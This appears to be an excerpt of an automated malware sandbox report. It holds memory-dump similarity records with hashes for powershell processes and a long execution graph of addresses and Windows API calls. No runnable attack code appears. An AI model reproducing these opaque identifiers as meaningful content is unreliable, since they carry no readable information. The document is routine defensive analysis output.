• String ID: M_^6$M_^<$M_^F$M_^I$M_^J
• API String ID: 0-1500707516
• Opcode ID: d80d34d9bc5ae39b6e4c6805338084298f4a25165cf5b2188607347adce72b21
• Instruction ID: ec08b0e42df8aefe4e0fdd4c938956361d09831a89bba499b64af5c36ab90da1
• Opcode Fuzzy Hash: d80d34d9bc5ae39b6e4c6805338084298f4a25165cf5b2188607347adce72b21
• Instruction Fuzzy Hash: 3E210777704465DED30576ADB8189DC73C0DBA427638A47F3E169CB583ED14A09746C4

Strings
Memory Dump Source
• Source File: 00000007.00000002.1841975012.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffd9ac90000_powershell.jbxd
Similarity
• API ID:
• String ID: M_^$M_^$M_^$M_^$M_^
• API String ID: 0-2396788759
• Opcode ID: 2dc90a3df7b6a3df4f3b43745f1057276d20ddc9cf260df4ccf4bef733ff90c6
• Instruction ID: 14646979f294268459c11048856388c7c07f50acf3c0ad2071ef91aa0fe03cc8
• Opcode Fuzzy Hash: 2dc90a3df7b6a3df4f3b43745f1057276d20ddc9cf260df4ccf4bef733ff90c6
• Instruction Fuzzy Hash: D8F08C62E0D6C2CAF35B526408BC1842FD12F92354B4E41FBD0BC9B0A7A819980A82A5

Strings
Memory Dump Source
• Source File: 00000026.00000002.1899344146.00007FFD9ACB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ACB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_7ffd9acb0000_powershell.jbxd
Similarity
• API ID:
• String ID: ^
• API String ID: 0-1590793086
• Opcode ID: d472b86d934421fb196552c218afd9eaf5ef42dfc4cf0f891462a0f3232d0671
• Instruction ID: 5083e60bec560f96851b7e57cb38be7a043b03167e64a6ada1fb39e457d9a156
• Opcode Fuzzy Hash: d472b86d934421fb196552c218afd9eaf5ef42dfc4cf0f891462a0f3232d0671
• Instruction Fuzzy Hash: 27C11A36E0D6859FE7159BACD8A42AC7BB0EF86314F0841FBD499DB1D7CE296806C740

Memory Dump Source
• Source File: 00000026.00000002.1900707928.00007FFD9AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AD80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_7ffd9ad80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 098f4a56373fe905250b021ea999ebf387e4cbf7b0bfdc36ec0a226fa2bd02c6
• Instruction ID: 025dee12c1f1e0d38595f3b5501acc0c97d8a66c45d7b4a70a997bb53977f909
• Opcode Fuzzy Hash: 098f4a56373fe905250b021ea999ebf387e4cbf7b0bfdc36ec0a226fa2bd02c6
• Instruction Fuzzy Hash: 27C11923B0DA854FE76A9B7C58656B57BE1EF56210B0D01FBE05CCB1D7E928AC09C341

Memory Dump Source
• Source File: 00000026.00000002.1900707928.00007FFD9AD80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AD80000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_38_2_7ffd9ad80000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 80dbac03671b768975b0f560ebec5d88c42a1f523dffb692025d78b336368d15
                                                                                                                                                                                                                                            • Instruction ID: 56562e4027264fa6ed8d027a8636eead20da8ac470c258aa4fa2d174da4a90c2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 80dbac03671b768975b0f560ebec5d88c42a1f523dffb692025d78b336368d15
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B411D23B0CE494FE7AD965C54616F973E2DF84220B4810FBE05ECB1D7FE29E8158241
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000026.00000002.1899344146.00007FFD9ACB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ACB0000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_38_2_7ffd9acb0000_powershell.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                            • Instruction ID: 997fdd2bf33ae35a91af1d64776fc8c427ef5541916771d309e940885d01838b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C701A73120CB0C4FD748EF0CE051AA5B3E0FB85320F10056EE58AC3691D632E881CB45

Execution Graph

Execution Coverage: 7.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0.5%
Total number of Nodes: 1119
Total number of Limit Nodes: 39
39034->38970 39035->38975 39037->38982 39038->38986 39039->38988 39040->38991 39041->38973 39042->38977 39043->38983 39045 7ff702c218ca 39044->39045 39050 7ff702c218db 39044->39050 39046 7ff702c218de 39045->39046 39047 7ff702c218d6 39045->39047 39045->39050 39070 7ff702c21930 39046->39070 39048 7ff702c21c24 12 API calls 39047->39048 39048->39050 39050->38973 39058 7ff702c21af0 39052->39058 39055 7ff702c223f9 39055->39027 39057 7ff702c1ca40 61 API calls _CxxThrowException 39055->39057 39057->39027 39059 7ff702c21b01 setbuf 39058->39059 39060 7ff702c21b6f CreateFileW 39059->39060 39061 7ff702c21b68 39059->39061 39060->39061 39062 7ff702c34534 10 API calls 39061->39062 39063 7ff702c21be1 39061->39063 39064 7ff702c21bb3 39062->39064 39066 7ff702c5a610 _handle_error 8 API calls 39063->39066 39064->39063 39065 7ff702c21bb7 CreateFileW 39064->39065 39065->39063 39067 7ff702c21c14 39066->39067 39067->39055 39068 7ff702c1ca08 10 API calls 39067->39068 39068->39055 39069->39030 39071 7ff702c21964 39070->39071 39072 7ff702c2194c 39070->39072 39073 7ff702c21988 39071->39073 39076 7ff702c1c9d0 10 API calls 39071->39076 39072->39071 39074 7ff702c21958 CloseHandle 39072->39074 39073->39050 39074->39071 39076->39073 39077 7ff702c03e71 39078 7ff702c03e81 39077->39078 39081 7ff702c03e89 39077->39081 39078->39081 39088 7ff702c59a14 49 API calls 39078->39088 39080 7ff702c03edd 39083 7ff702c5a610 _handle_error 8 API calls 39080->39083 39081->39080 39082 7ff702c03ea3 39081->39082 39089 7ff702c2331c 48 API calls 2 library calls 39082->39089 39085 7ff702c03eef 39083->39085 39086 7ff702c03eab 39086->39080 39090 7ff702c063e8 8 API calls 2 library calls 39086->39090 39088->39081 39089->39086 39090->39080 39091 7ff702c4a924 39093 7ff702c4a949 snprintf 39091->39093 39092 7ff702c4a97f CompareStringA 39093->39092 39094 7ff702c082f0 39095 7ff702c08306 39094->39095 39107 7ff702c0836f 39094->39107 39096 7ff702c08324 39095->39096 39099 7ff702c08371 39095->39099 39095->39107 39214 7ff702c22414 61 API 
calls 39096->39214 39098 7ff702c08347 39215 7ff702c21998 138 API calls 39098->39215 39099->39107 39216 7ff702c21998 138 API calls 39099->39216 39102 7ff702c0835e 39103 7ff702c218ac 15 API calls 39102->39103 39103->39107 39117 7ff702c0a410 39107->39117 39108 7ff702c08578 39109 7ff702c0b540 147 API calls 39108->39109 39114 7ff702c0858f 39109->39114 39110 7ff702c0b540 147 API calls 39110->39108 39111 7ff702c08634 39112 7ff702c5a610 _handle_error 8 API calls 39111->39112 39113 7ff702c08663 39112->39113 39114->39111 39217 7ff702c09628 175 API calls 39114->39217 39218 7ff702c37a68 39117->39218 39120 7ff702c0853a 39122 7ff702c0b540 39120->39122 39126 7ff702c0b55f setbuf 39122->39126 39123 7ff702c0b5a1 39124 7ff702c0b5d8 39123->39124 39125 7ff702c0b5b8 39123->39125 39366 7ff702c38c1c 39124->39366 39252 7ff702c0aba0 39125->39252 39126->39123 39248 7ff702c0a4d0 39126->39248 39129 7ff702c5a610 _handle_error 8 API calls 39131 7ff702c0854f 39129->39131 39130 7ff702c0b67f 39132 7ff702c0bc91 39130->39132 39133 7ff702c0bbae 39130->39133 39134 7ff702c0b6a5 39130->39134 39131->39108 39131->39110 39135 7ff702c22574 126 API calls 39132->39135 39212 7ff702c0b5d3 39132->39212 39136 7ff702c38d00 48 API calls 39133->39136 39147 7ff702c0b6b5 39134->39147 39163 7ff702c0b79f 39134->39163 39134->39212 39135->39212 39138 7ff702c0bc5c 39136->39138 39435 7ff702c38d38 48 API calls 39138->39435 39142 7ff702c0bc69 39436 7ff702c38d38 48 API calls 39142->39436 39145 7ff702c0bc76 39437 7ff702c38d38 48 API calls 39145->39437 39147->39212 39400 7ff702c38d00 39147->39400 39148 7ff702c0bc84 39438 7ff702c38d88 48 API calls 39148->39438 39153 7ff702c0b726 39404 7ff702c38d38 48 API calls 39153->39404 39155 7ff702c0b733 39156 7ff702c0b749 39155->39156 39405 7ff702c38d88 48 API calls 39155->39405 39158 7ff702c0b75c 39156->39158 39406 7ff702c38d38 48 API calls 39156->39406 39160 7ff702c0b779 39158->39160 39162 7ff702c38d00 48 API calls 39158->39162 39407 7ff702c38f94 39160->39407 39162->39158 39164 7ff702c0b8e5 
39163->39164 39417 7ff702c0c3c8 CharLowerW CharUpperW 39163->39417 39418 7ff702c4d840 WideCharToMultiByte 39164->39418 39168 7ff702c0b9a1 39169 7ff702c38d00 48 API calls 39168->39169 39171 7ff702c0b9c4 39169->39171 39421 7ff702c38d38 48 API calls 39171->39421 39173 7ff702c0b910 39173->39168 39420 7ff702c0945c 55 API calls _handle_error 39173->39420 39174 7ff702c0b9d1 39422 7ff702c38d38 48 API calls 39174->39422 39176 7ff702c0b9de 39423 7ff702c38d88 48 API calls 39176->39423 39178 7ff702c0b9eb 39424 7ff702c38d88 48 API calls 39178->39424 39180 7ff702c0ba0b 39181 7ff702c38d00 48 API calls 39180->39181 39182 7ff702c0ba27 39181->39182 39425 7ff702c38d88 48 API calls 39182->39425 39184 7ff702c0ba37 39185 7ff702c0ba49 39184->39185 39426 7ff702c4bc48 15 API calls 39184->39426 39427 7ff702c38d88 48 API calls 39185->39427 39188 7ff702c0ba59 39189 7ff702c38d00 48 API calls 39188->39189 39190 7ff702c0ba66 39189->39190 39191 7ff702c38d00 48 API calls 39190->39191 39192 7ff702c0ba78 39191->39192 39428 7ff702c38d38 48 API calls 39192->39428 39194 7ff702c0ba85 39429 7ff702c38d88 48 API calls 39194->39429 39196 7ff702c0ba92 39197 7ff702c0bacd 39196->39197 39430 7ff702c38d88 48 API calls 39196->39430 39432 7ff702c38e3c 39197->39432 39199 7ff702c0bab2 39431 7ff702c38d88 48 API calls 39199->39431 39202 7ff702c0bb33 39204 7ff702c0bb53 39202->39204 39207 7ff702c38e3c 48 API calls 39202->39207 39208 7ff702c0bb6e 39204->39208 39210 7ff702c38e3c 48 API calls 39204->39210 39205 7ff702c38d00 48 API calls 39209 7ff702c0bb09 39205->39209 39206 7ff702c38e3c 48 API calls 39206->39202 39207->39204 39211 7ff702c38f94 126 API calls 39208->39211 39209->39202 39209->39206 39210->39208 39211->39212 39212->39129 39214->39098 39215->39102 39216->39107 39217->39111 39219 7ff702c0a434 39218->39219 39221 7ff702c37a8d 39218->39221 39219->39120 39226 7ff702c222e0 39219->39226 39220 7ff702c37aaf 39220->39219 39222 7ff702c222e0 12 API calls 39220->39222 39221->39220 39231 7ff702c37340 157 API calls 
39221->39231 39224 7ff702c37adf 39222->39224 39232 7ff702c22440 39224->39232 39242 7ff702c220b4 39226->39242 39229 7ff702c22307 39229->39120 39231->39220 39233 7ff702c2246a SetFilePointer 39232->39233 39234 7ff702c22454 39232->39234 39235 7ff702c2248d GetLastError 39233->39235 39238 7ff702c224ad 39233->39238 39234->39238 39240 7ff702c1cd00 10 API calls 39234->39240 39237 7ff702c22497 39235->39237 39235->39238 39237->39238 39241 7ff702c1cd00 10 API calls 39237->39241 39238->39219 39245 7ff702c22130 39242->39245 39246 7ff702c220d0 39242->39246 39243 7ff702c22102 SetFilePointer 39244 7ff702c22126 GetLastError 39243->39244 39243->39245 39244->39245 39245->39229 39247 7ff702c1cd00 10 API calls 39245->39247 39246->39243 39249 7ff702c0a4ea 39248->39249 39250 7ff702c0a4ee 39249->39250 39251 7ff702c22440 12 API calls 39249->39251 39250->39123 39251->39250 39253 7ff702c0abbf setbuf 39252->39253 39254 7ff702c38c1c 48 API calls 39253->39254 39257 7ff702c0abf5 39254->39257 39255 7ff702c0b4af 39258 7ff702c0b4ff 39255->39258 39262 7ff702c22574 126 API calls 39255->39262 39256 7ff702c0acbf 39259 7ff702c0acc8 39256->39259 39260 7ff702c0b35c 39256->39260 39257->39255 39261 7ff702c19be0 14 API calls 39257->39261 39288 7ff702c0aca7 39257->39288 39263 7ff702c372c0 4 API calls 39258->39263 39265 7ff702c0acdd 39259->39265 39272 7ff702c0ad60 39259->39272 39308 7ff702c0aea7 39259->39308 39264 7ff702c38eec 48 API calls 39260->39264 39266 7ff702c0ac34 39261->39266 39262->39258 39263->39272 39267 7ff702c0b395 39264->39267 39268 7ff702c0ad68 39265->39268 39269 7ff702c0ace6 39265->39269 39270 7ff702c190b8 75 API calls 39266->39270 39271 7ff702c0b3ad 39267->39271 39457 7ff702c09e2c 48 API calls 39267->39457 39274 7ff702c38eec 48 API calls 39268->39274 39269->39272 39439 7ff702c38eec 39269->39439 39273 7ff702c0ac8f 39270->39273 39277 7ff702c38eec 48 API calls 39271->39277 39276 7ff702c5a610 _handle_error 8 API calls 39272->39276 39283 7ff702c22574 126 API calls 39273->39283 39273->39288 39280 
7ff702c0ad9c 39274->39280 39281 7ff702c0b52b 39276->39281 39278 7ff702c0b3d4 39277->39278 39285 7ff702c38eec 48 API calls 39278->39285 39286 7ff702c0b3e6 39278->39286 39284 7ff702c38eec 48 API calls 39280->39284 39281->39212 39283->39288 39289 7ff702c0ada9 39284->39289 39285->39286 39291 7ff702c38eec 48 API calls 39286->39291 39287 7ff702c38eec 48 API calls 39292 7ff702c0ad31 39287->39292 39288->39255 39288->39256 39290 7ff702c38eec 48 API calls 39289->39290 39293 7ff702c0adb5 39290->39293 39294 7ff702c0b451 39291->39294 39295 7ff702c38eec 48 API calls 39292->39295 39296 7ff702c38eec 48 API calls 39293->39296 39297 7ff702c0b471 39294->39297 39303 7ff702c38eec 48 API calls 39294->39303 39298 7ff702c0ad46 39295->39298 39299 7ff702c0adc2 39296->39299 39301 7ff702c0b486 39297->39301 39304 7ff702c38e3c 48 API calls 39297->39304 39300 7ff702c38f94 126 API calls 39298->39300 39302 7ff702c38d00 48 API calls 39299->39302 39300->39272 39305 7ff702c38f94 126 API calls 39301->39305 39306 7ff702c0adcf 39302->39306 39303->39297 39304->39301 39305->39272 39309 7ff702c190b8 75 API calls 39306->39309 39307 7ff702c0afda 39316 7ff702c0aff2 39307->39316 39448 7ff702c09d98 48 API calls 39307->39448 39308->39307 39447 7ff702c09b64 48 API calls _handle_error 39308->39447 39312 7ff702c0ae22 39309->39312 39313 7ff702c38e3c 48 API calls 39312->39313 39314 7ff702c0ae33 39313->39314 39315 7ff702c38e3c 48 API calls 39314->39315 39319 7ff702c0ae48 39315->39319 39317 7ff702c0b02b 39316->39317 39449 7ff702c09efc 48 API calls _handle_error 39316->39449 39318 7ff702c0b0af 39317->39318 39450 7ff702c0a2c8 48 API calls 39317->39450 39322 7ff702c0b0c8 39318->39322 39451 7ff702c0a1a0 48 API calls 2 library calls 39318->39451 39326 7ff702c49ce4 8 API calls 39319->39326 39324 7ff702c0b0e2 39322->39324 39452 7ff702c0a350 48 API calls _handle_error 39322->39452 39327 7ff702c38eec 48 API calls 39324->39327 39328 7ff702c0ae60 39326->39328 39330 7ff702c0b0fc 39327->39330 39329 7ff702c49b70 8 API calls 
39328->39329 39331 7ff702c0ae6d 39329->39331 39332 7ff702c38eec 48 API calls 39330->39332 39333 7ff702c38e3c 48 API calls 39331->39333 39334 7ff702c0b109 39332->39334 39335 7ff702c0ae80 39333->39335 39336 7ff702c0b11f 39334->39336 39338 7ff702c38eec 48 API calls 39334->39338 39337 7ff702c38f94 126 API calls 39335->39337 39443 7ff702c38e94 39336->39443 39337->39272 39338->39336 39341 7ff702c38eec 48 API calls 39342 7ff702c0b147 39341->39342 39343 7ff702c38e94 48 API calls 39342->39343 39344 7ff702c0b15f 39343->39344 39345 7ff702c38eec 48 API calls 39344->39345 39348 7ff702c0b16c 39345->39348 39346 7ff702c0b18a 39347 7ff702c0b1a9 39346->39347 39454 7ff702c38d88 48 API calls 39346->39454 39350 7ff702c38e94 48 API calls 39347->39350 39348->39346 39453 7ff702c38d88 48 API calls 39348->39453 39352 7ff702c0b1bc 39350->39352 39353 7ff702c38eec 48 API calls 39352->39353 39354 7ff702c0b1d6 39353->39354 39356 7ff702c0b1e9 39354->39356 39455 7ff702c0c3c8 CharLowerW CharUpperW 39354->39455 39356->39356 39357 7ff702c38eec 48 API calls 39356->39357 39358 7ff702c0b21f 39357->39358 39359 7ff702c38e3c 48 API calls 39358->39359 39360 7ff702c0b230 39359->39360 39361 7ff702c0b247 39360->39361 39362 7ff702c38e3c 48 API calls 39360->39362 39363 7ff702c38f94 126 API calls 39361->39363 39362->39361 39364 7ff702c0b278 39363->39364 39364->39272 39456 7ff702c370d8 4 API calls 2 library calls 39364->39456 39458 7ff702c38f28 39366->39458 39369 7ff702c190b8 39370 7ff702c191a9 39369->39370 39371 7ff702c19123 39369->39371 39372 7ff702c5a610 _handle_error 8 API calls 39370->39372 39371->39370 39476 7ff702c47e74 39371->39476 39374 7ff702c0b66e 39372->39374 39385 7ff702c22574 39374->39385 39376 7ff702c4d840 WideCharToMultiByte 39377 7ff702c19157 39376->39377 39377->39370 39378 7ff702c1916a 39377->39378 39379 7ff702c191c4 39377->39379 39380 7ff702c191ab 39378->39380 39381 7ff702c1916f 39378->39381 39495 7ff702c19338 12 API calls _handle_error 39379->39495 39494 7ff702c1951c 71 API calls _handle_error 
39380->39494 39381->39370 39480 7ff702c198b0 39381->39480 39386 7ff702c2259e 39385->39386 39387 7ff702c225a5 39385->39387 39386->39130 39388 7ff702c225ab GetStdHandle 39387->39388 39395 7ff702c225ba 39387->39395 39388->39395 39389 7ff702c22619 WriteFile 39389->39395 39390 7ff702c225cf WriteFile 39391 7ff702c2260b 39390->39391 39390->39395 39391->39390 39391->39395 39392 7ff702c22658 GetLastError 39392->39395 39394 7ff702c22684 SetLastError 39394->39395 39395->39386 39395->39389 39395->39390 39395->39392 39398 7ff702c22721 39395->39398 39560 7ff702c23144 9 API calls 2 library calls 39395->39560 39561 7ff702c1cf34 10 API calls 39395->39561 39562 7ff702c1c95c 126 API calls 39395->39562 39563 7ff702c1cf14 10 API calls 39398->39563 39401 7ff702c0161c 48 API calls 39400->39401 39402 7ff702c0b719 39401->39402 39403 7ff702c38d38 48 API calls 39402->39403 39403->39153 39404->39155 39405->39156 39406->39158 39408 7ff702c39131 39407->39408 39411 7ff702c38fcf 39407->39411 39408->39212 39409 7ff702c390e0 39409->39408 39412 7ff702c22574 126 API calls 39409->39412 39410 7ff702c3905d 39410->39409 39413 7ff702c0161c 48 API calls 39410->39413 39411->39410 39564 7ff702c1ca6c 48 API calls 3 library calls 39411->39564 39412->39408 39413->39409 39415 7ff702c3904c 39565 7ff702c1ca40 61 API calls _CxxThrowException 39415->39565 39417->39164 39419 7ff702c0b8f8 CharToOemA 39418->39419 39419->39173 39420->39168 39421->39174 39422->39176 39423->39178 39424->39180 39425->39184 39426->39185 39427->39188 39428->39194 39429->39196 39430->39199 39431->39197 39433 7ff702c0161c 48 API calls 39432->39433 39434 7ff702c0baf2 39433->39434 39434->39202 39434->39205 39434->39209 39435->39142 39436->39145 39437->39148 39438->39132 39440 7ff702c38efc 39439->39440 39441 7ff702c38d00 48 API calls 39440->39441 39442 7ff702c0ad24 39440->39442 39441->39440 39442->39287 39445 7ff702c38eac 39443->39445 39444 7ff702c38d00 48 API calls 39444->39445 39445->39444 39446 7ff702c0b137 39445->39446 39446->39341 
39447->39307 39448->39316 39449->39317 39450->39318 39451->39322 39452->39324 39453->39346 39454->39347 39455->39356 39456->39272 39457->39271 39461 7ff702c0161c 39458->39461 39460 7ff702c0b601 39460->39130 39460->39132 39460->39369 39463 7ff702c01640 39461->39463 39471 7ff702c016aa __BuildCatchObjectHelper 39461->39471 39462 7ff702c0166d 39467 7ff702c016d4 39462->39467 39468 7ff702c0168e 39462->39468 39463->39462 39472 7ff702c1ca6c 48 API calls 3 library calls 39463->39472 39465 7ff702c01661 39473 7ff702c1cb64 8 API calls 39465->39473 39467->39471 39475 7ff702c1cb64 8 API calls 39467->39475 39468->39471 39474 7ff702c1cb64 8 API calls 39468->39474 39471->39460 39472->39465 39477 7ff702c19143 39476->39477 39478 7ff702c47e95 39476->39478 39477->39376 39479 7ff702c47ec8 68 API calls 39478->39479 39479->39477 39484 7ff702c19920 39480->39484 39489 7ff702c19b45 39480->39489 39481 7ff702c5a610 _handle_error 8 API calls 39482 7ff702c19b61 39481->39482 39482->39370 39485 7ff702c1996d 39484->39485 39486 7ff702c19b75 39484->39486 39496 7ff702c47da8 39484->39496 39485->39485 39503 7ff702c1a0f4 39485->39503 39488 7ff702c47f24 68 API calls 39486->39488 39490 7ff702c19acb 39488->39490 39489->39481 39490->39489 39533 7ff702c44ea8 8 API calls _handle_error 39490->39533 39491 7ff702c199d0 39519 7ff702c47f24 39491->39519 39494->39370 39495->39370 39497 7ff702c47e74 68 API calls 39496->39497 39498 7ff702c47ddc 39497->39498 39499 7ff702c47e74 68 API calls 39498->39499 39500 7ff702c47def 39499->39500 39501 7ff702c5a610 _handle_error 8 API calls 39500->39501 39502 7ff702c47e43 39501->39502 39502->39484 39506 7ff702c1a15c __BuildCatchObjectHelper 39503->39506 39504 7ff702c1a358 39556 7ff702c5a774 8 API calls __report_securityfailure 39504->39556 39506->39504 39509 7ff702c1a34d 39506->39509 39510 7ff702c1a192 39506->39510 39513 7ff702c1a352 39506->39513 39508 7ff702c1a35e 39554 7ff702c5a774 8 API calls __report_securityfailure 39509->39554 39534 7ff702c19dd8 39510->39534 39555 7ff702c5a774 
8 API calls __report_securityfailure 39513->39555 39514 7ff702c1a1d9 39515 7ff702c19dd8 8 API calls 39514->39515 39516 7ff702c1a2f1 39514->39516 39515->39514 39517 7ff702c5a610 _handle_error 8 API calls 39516->39517 39518 7ff702c1a33b 39517->39518 39518->39491 39520 7ff702c47f5e 39519->39520 39521 7ff702c47fb5 39519->39521 39520->39521 39522 7ff702c4b3f0 10 API calls 39520->39522 39524 7ff702c4805c GetCurrentProcessId 39521->39524 39525 7ff702c47ff1 39521->39525 39523 7ff702c47f72 39522->39523 39523->39521 39526 7ff702c47f7e GetProcAddressForCaller GetProcAddress 39523->39526 39527 7ff702c48034 39524->39527 39525->39527 39557 7ff702c1ca6c 48 API calls 3 library calls 39525->39557 39526->39521 39527->39490 39529 7ff702c4801f 39558 7ff702c1cda4 10 API calls 2 library calls 39529->39558 39531 7ff702c48027 39559 7ff702c1ca40 61 API calls _CxxThrowException 39531->39559 39533->39489 39535 7ff702c19e46 39534->39535 39539 7ff702c19e6e memcpy_s 39534->39539 39536 7ff702c49ce4 8 API calls 39535->39536 39537 7ff702c19e5e 39536->39537 39540 7ff702c49b70 8 API calls 39537->39540 39538 7ff702c49ce4 8 API calls 39542 7ff702c19f97 39538->39542 39541 7ff702c19e85 39539->39541 39543 7ff702c49ce4 8 API calls 39539->39543 39540->39539 39541->39538 39544 7ff702c49b70 8 API calls 39542->39544 39543->39541 39547 7ff702c19fa8 memcpy_s 39544->39547 39545 7ff702c19fb4 39546 7ff702c49ce4 8 API calls 39545->39546 39549 7ff702c1a0bb 39546->39549 39547->39545 39548 7ff702c49ce4 8 API calls 39547->39548 39548->39545 39550 7ff702c49b70 8 API calls 39549->39550 39551 7ff702c1a0c9 39550->39551 39552 7ff702c5a610 _handle_error 8 API calls 39551->39552 39553 7ff702c1a0d8 39552->39553 39553->39514 39554->39513 39555->39504 39556->39508 39557->39529 39558->39531 39559->39527 39560->39394 39562->39395 39564->39415 39565->39410 39566 7ff702c07a5b 39567 7ff702c07a60 39566->39567 39568 7ff702c19be0 14 API calls 39567->39568 39569 7ff702c07af7 39567->39569 39568->39569 39570 7ff702c07bda 39569->39570 39599 
7ff702c21e1c GetFileTime 39569->39599 39572 7ff702c0b540 147 API calls 39570->39572 39573 7ff702c07bf8 39572->39573 39576 7ff702c07c3e 39573->39576 39600 7ff702c59b98 216 API calls 3 library calls 39573->39600 39575 7ff702c0b540 147 API calls 39578 7ff702c07c9c 39575->39578 39576->39575 39577 7ff702c07f89 39578->39577 39601 7ff702c26378 39578->39601 39580 7ff702c07cd7 39581 7ff702c26378 4 API calls 39580->39581 39583 7ff702c07cf3 39581->39583 39582 7ff702c07de1 39589 7ff702c07e4e 39582->39589 39606 7ff702c398dc 39582->39606 39583->39582 39585 7ff702c07d59 39583->39585 39586 7ff702c07d38 39583->39586 39587 7ff702c5a444 new 4 API calls 39585->39587 39588 7ff702c5a444 new 4 API calls 39586->39588 39594 7ff702c07d42 std::bad_alloc::bad_alloc 39587->39594 39588->39594 39612 7ff702c01204 48 API calls 39589->39612 39591 7ff702c07eb3 39593 7ff702c07edb 39591->39593 39613 7ff702c39680 39591->39613 39619 7ff702c26424 8 API calls _handle_error 39593->39619 39594->39582 39605 7ff702c5ba34 RtlPcToFileHeader RaiseException 39594->39605 39597 7ff702c07f56 39598 7ff702c0b540 147 API calls 39597->39598 39598->39577 39599->39570 39600->39576 39602 7ff702c26396 39601->39602 39604 7ff702c263a0 39601->39604 39603 7ff702c5a444 new 4 API calls 39602->39603 39603->39604 39604->39580 39605->39582 39607 7ff702c3993c 39606->39607 39608 7ff702c39926 39606->39608 39610 7ff702c190b8 75 API calls 39607->39610 39609 7ff702c190b8 75 API calls 39608->39609 39611 7ff702c39934 39609->39611 39610->39611 39611->39589 39612->39591 39617 7ff702c396a4 39613->39617 39614 7ff702c397d7 39615 7ff702c22574 126 API calls 39615->39617 39617->39614 39617->39615 39618 7ff702c59b98 216 API calls 39617->39618 39620 7ff702c26498 72 API calls new 39617->39620 39618->39617 39619->39597 39620->39617 39621 7ff702c69c74 39622 7ff702c69c7c 39621->39622 39623 7ff702c69cbb 39622->39623 39624 7ff702c69cac 39622->39624 39627 7ff702c69cc5 39623->39627 39643 7ff702c6ce08 32 API calls 2 library calls 39623->39643 39642 
7ff702c64f3c 15 API calls _invalid_parameter_noinfo 39624->39642 39630 7ff702c64b8c 39627->39630 39629 7ff702c69cb1 memcpy_s 39631 7ff702c64bab 39630->39631 39632 7ff702c64ba1 39630->39632 39634 7ff702c64bb0 39631->39634 39640 7ff702c64bb7 __vcrt_getptd_noexit 39631->39640 39644 7ff702c64ab4 39632->39644 39651 7ff702c64a74 39634->39651 39635 7ff702c64ba9 39635->39629 39637 7ff702c64bf6 39657 7ff702c64f3c 15 API calls _invalid_parameter_noinfo 39637->39657 39639 7ff702c64be0 RtlReAllocateHeap 39639->39635 39639->39640 39640->39637 39640->39639 39641 7ff702c636c0 new 2 API calls 39640->39641 39641->39640 39642->39629 39643->39627 39645 7ff702c64ac3 __vcrt_getptd_noexit 39644->39645 39646 7ff702c64aff 39644->39646 39645->39646 39647 7ff702c64ae6 RtlAllocateHeap 39645->39647 39650 7ff702c636c0 new 2 API calls 39645->39650 39658 7ff702c64f3c 15 API calls _invalid_parameter_noinfo 39646->39658 39647->39645 39649 7ff702c64afd 39647->39649 39649->39635 39650->39645 39652 7ff702c64a79 RtlFreeHeap 39651->39652 39653 7ff702c64aa9 Concurrency::details::SchedulerProxy::DeleteThis 39651->39653 39652->39653 39654 7ff702c64a94 39652->39654 39653->39635 39659 7ff702c64f3c 15 API calls _invalid_parameter_noinfo 39654->39659 39656 7ff702c64a99 GetLastError 39656->39653 39657->39635 39658->39649 39659->39656 39660 7ff702c4bb70 39663 7ff702c4bb80 39660->39663 39672 7ff702c4bae8 39663->39672 39665 7ff702c4bb79 39666 7ff702c4bb97 39666->39665 39677 7ff702c11690 39666->39677 39668 7ff702c4bbc8 SetEvent 39669 7ff702c4bbd5 LeaveCriticalSection 39668->39669 39670 7ff702c4bae8 67 API calls 39669->39670 39670->39666 39681 7ff702c4b974 WaitForSingleObject 39672->39681 39675 7ff702c4bb16 EnterCriticalSection LeaveCriticalSection 39676 7ff702c4bb12 39675->39676 39676->39666 39678 7ff702c116c2 EnterCriticalSection 39677->39678 39680 7ff702c116a4 39677->39680 39678->39668 39678->39669 39680->39678 39689 7ff702c11180 39680->39689 39682 7ff702c4b9b7 39681->39682 39683 7ff702c4b986 GetLastError 
39681->39683 39682->39675 39682->39676 39687 7ff702c1ca6c 48 API calls 3 library calls 39683->39687 39685 7ff702c4b9a6 39688 7ff702c1ca40 61 API calls _CxxThrowException 39685->39688 39687->39685 39688->39682 39690 7ff702c111ab 39689->39690 39697 7ff702c111b0 39689->39697 39699 7ff702c117c8 216 API calls 2 library calls 39690->39699 39691 7ff702c1166a 39691->39680 39693 7ff702c36d38 216 API calls 39693->39697 39694 7ff702c36fe8 216 API calls 39694->39697 39695 7ff702c11080 48 API calls 39695->39697 39696 7ff702c36e90 216 API calls 39696->39697 39697->39691 39697->39693 39697->39694 39697->39695 39697->39696 39700 7ff702c117c8 216 API calls 2 library calls 39697->39700 39699->39697 39700->39697
Strings
Memory Dump Source
